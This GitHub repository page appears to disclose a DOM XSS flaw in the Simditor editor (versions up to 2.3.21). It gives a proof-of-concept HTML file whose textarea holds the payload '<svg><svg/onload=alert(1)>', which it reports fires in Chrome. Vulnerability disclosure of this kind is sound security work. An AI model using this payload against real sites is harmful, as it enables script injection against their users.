Skip to content

hkglue/simditor_dom_xss

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 

simditor

https://github.com/mycolorway/simditor DOM XSS

Download the Simditor source code(<=2.3.21).

We just need this three js. image

Edit a HTML FILE

<html>
<title>test</title>
<body>
<script type="text/javascript" src="./jquery.min.js"></script>
<script type="text/javascript" src="./module.js"></script>
<script type="text/javascript" src="./hotkeys.js"></script>
<script type="text/javascript" src="./simditor.js"></script>

<textarea id="editor"><svg><svg/onload=alert(1)></textarea>
<script>var editor = new Simditor({textarea: $('#editor')});</script>

</body>
</html>

Open the HTML in any browser.

*This is in my chrome,THE XSS PAYLOAD IS EXECUTE ! image

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published